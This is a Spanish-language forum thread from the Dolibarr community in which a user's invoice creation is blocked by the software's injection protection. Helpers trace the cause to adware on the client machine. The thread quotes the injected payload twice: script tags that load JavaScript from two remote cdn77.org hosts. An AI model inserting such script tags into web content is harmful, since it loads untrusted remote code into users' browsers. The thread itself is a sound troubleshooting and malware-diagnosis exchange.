Bienvenido a los foros %s

Foro comunidad hispana Dolibarr

Identificarse Registrarse

Error SQL

Cuestiones,problemas sobre la instalción Dolibarr con windows(DoliWamp) , MacOS (DoliMamp), Gnu/linux, una web externa que proporciona alojamiento ....
sqsistemes
Soldado
Mensajes: 60
Registrado: Sab, 29/01/2011, 15:18

Error SQL

Mensaje por sqsistemes »

Hola,

Desde hace unas semanas, no recuerdo si tras la actualización a la versión 9 o antes, me ha aparecido un error de SQL al tratar de crear una factura a un cliente, ya sea desde la sección "Financiera" o desde la ficha del cliente, el error es el mismo y es de inyección de SQL...

"Access refused by SQL/Script injection protection in main.inc.php (type=0 key=note_public value=<br /> <script async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js"></script> <script src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js"></script> page=/htdocs/compta/facture/card.php)"

Lo tengo instalado en una máquina propia, la primera vez que me salió acabé por hacer backup y llevarlo a otra máquina donde ha funcionado sin problemas una semana aprox, y ahora me encuentro otra vez el mismo problema. Da igual que acceda desde el exterior por nombre de dominio que a través de la ip interna de la máquina, al querer crear la factura me aparece el error.

Necesito encontrar la solución definitiva a esto, no puedo estar migrando todo cada semana a máquinas distintas.

Muchas gracias

Avatar de Usuario
ferran
Jedi
Mensajes: 544
Registrado: Vie, 18/01/2013, 16:31
Ubicación: Gandia, Valencia

Mensaje por ferran »

Hola,

en el mensaje de error pone algo de la nota pública. ¿Estás indicando algo en la nota pública cuando creas la factura? Tal vez haciendo copia-pega se está rellenando ahí algo raro.

Un saludo.
2byte.es Preferred Partner de Dolibarr.
¿Quieres soporte profesional? Contacta con nosotros

sqsistemes
Soldado
Mensajes: 60
Registrado: Sab, 29/01/2011, 15:18

Mensaje por sqsistemes »

No nada lo dejo en blanco... escojo cliente, pongo fecha y método de cobro y al ir al borrador (todavía sin incluir nada) es cuando me aparece el error

Avatar de Usuario
ferran
Jedi
Mensajes: 544
Registrado: Vie, 18/01/2013, 16:31
Ubicación: Gandia, Valencia

Mensaje por ferran »

Hola,

pues Dolibarr está detectando que en el campo nota pública se le está enviando lo siguiente

Código: Seleccionar todo

<br /> <script async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js"></script> <script src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js"></script> 
Lo interpreta como algo malicioso y es lo que hace dar el error.

Un saludo.
2byte.es Preferred Partner de Dolibarr.
¿Quieres soporte profesional? Contacta con nosotros

sqsistemes
Soldado
Mensajes: 60
Registrado: Sab, 29/01/2011, 15:18

Mensaje por sqsistemes »

Cierto, si miro la nota pública y la privada como HTML aparece dicho código... si lo borro me permite continuar. Ahora he tirado adelante, voy a incluir una linea de producto y me dice lo mismo pero en la descripción y efectivamente si la miro como html vuelve a estar ese código incrustado ahí... Eso puede deberse a algun ataque o es un error de la instalación?

sqsistemes
Soldado
Mensajes: 60
Registrado: Sab, 29/01/2011, 15:18

Mensaje por sqsistemes »

He hecho búsquedas en la bbdd con las cadenas que suelta de la url 1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js y no encuentro nada. En los ficheros conf.php y main.inc.php tampoco. En Dolibarr en cualquier cuadro de texto, si lo miro como html, aparece; en la configuración del módulo de facturas tengo un texto libre puesto, ahí aparece, lo borro, le doy a guardar y vuelve a aparecer; si genero factura aparece en la nota pública, en la privada y en la descripción; al crear un presupuesto igual; en los pedidos... No sé donde más buscar para eliminarlo...

Gracias

Avatar de Usuario
aduart
Yoda
Mensajes: 1056
Registrado: Mié, 06/06/2012, 19:37

Mensaje por aduart »

Hola. Se me ocurre, desde un celular, crear una factura, y ver si tambien se genera ese texto raro.
Por si el problema esta en la maquina cliente.

Saludos,
Eduardo.

sqsistemes
Soldado
Mensajes: 60
Registrado: Sab, 29/01/2011, 15:18

Mensaje por sqsistemes »

JODER! Totalmente cierto... desde el móvil no aparece nada de ello. En casa de herrero cuchara de palo ostia! Ahora mismo estoy empezando a pasar programas de limpieza de malware y demás mierdas!

Gracias a los dos por la ayuda!

Avatar de Usuario
aduart
Yoda
Mensajes: 1056
Registrado: Mié, 06/06/2012, 19:37

Mensaje por aduart »

Si, hay que estar muy atento a todo, la web publica es una zona de peligro llena de zombies jaja.

Saludos,
Eduardo.